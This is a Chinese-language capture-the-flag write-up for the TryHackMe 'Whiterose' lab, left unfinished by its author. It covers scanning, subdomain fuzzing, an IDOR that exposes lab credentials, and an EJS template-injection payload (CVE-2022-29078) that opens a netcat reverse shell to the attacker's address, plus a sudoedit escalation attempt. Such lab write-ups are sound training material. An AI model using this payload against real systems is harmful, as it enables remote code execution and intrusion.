THM-Whiterose

烂尾了。。。

What’s Tyrell Wellick’s phone number?

└─# nmap -sS -sV -Pn -A 10.10.218.118
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-13 14:58 CST
Nmap scan report for 10.10.218.118
Host is up (0.39s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b9:07:96:0d:c4:b6:0c:d6:22:1a:e4:6c:8e:ac:6f:7d (RSA)
|   256 ba:ff:92:3e:0f:03:7e:da:30:ca:e3:52:8d:47:d9:6c (ECDSA)
|_  256 5d:e4:14:39:ca:06:17:47:93:53:86:de:2b:77:09:7d (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Aggressive OS guesses: Linux 3.1 (91%), Linux 3.2 (91%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (91%), Linux 2.6.32 (90%), Linux 3.1 - 3.2 (90%), Linux 3.2 - 4.9 (90%), Linux 3.7 - 3.10 (90%), Linux 5.0 - 5.5 (90%), QNAP QTS 4.0 - 4.2 (90%), ASUS RT-N56U WAP (Linux 3.4) (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8888/tcp)
HOP RTT       ADDRESS
1   0.34 ms   172.30.144.1
2   389.62 ms 10.21.0.1
3   390.09 ms 10.10.218.118

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.53 seconds

开放了 80，22

访问 web 网页，啥也没有

利用 fuff 测一下有没有子域名

└─# ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://cyprusbank.thm/ -H "Host:FUZZ.cyprusbank.thm" -fw 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://cyprusbank.thm/
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.cyprusbank.thm
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 1
________________________________________________

www                     [Status: 200, Size: 252, Words: 19, Lines: 9, Duration: 447ms]
admin                   [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 447ms]
:: Progress: [4989/4989] :: Job [1/1] :: 89 req/sec :: Duration: [0:00:56] :: Errors: 0 :

有两个

www.cyprusbank.thm
admin.cyprusbank.thm

在 admin.cyprusbank.thm 站点上有一个登录页面，用给出的用户密码登录进去

Olivia Cortez:olivi8

可以看到一些账户信息但是看不到具体的，在 Message 页面能看到一些消息，而且可以发现 url 有 ?c=5 这种，尝试改变页面，当 ?c=0 时有管理员账户信息

Gayle Bev:p~]P@5!6;rs558:q

登录进去就能看到账户信息

Tyrell Wellick:842-029-5701

What is the user.txt flag?

Setting 栏可以修改用户账号密码

然后用 Bp 拦截，发现把 password 字段改了之后会回显报错

ejs 报错,可以在网上搜到 CVE-2022-29078，Ejs 模板引擎注入实现 RCE

name=admin&password=111&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('busybox nc 10.21.118.213 1234 -e bash');s

监听拿到 flag

THM{4lways_upd4te_uR_d3p3nd3nc!3s}

What is the root.txt flag?

sudo -l
Matching Defaults entries for web on cyprusbank:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR
    XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    mail_badpass

User web may run the following commands on cyprusbank:
    (root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm

发现 sudoedit 可以 sudo 提权。后面的文件写不进去服了。。。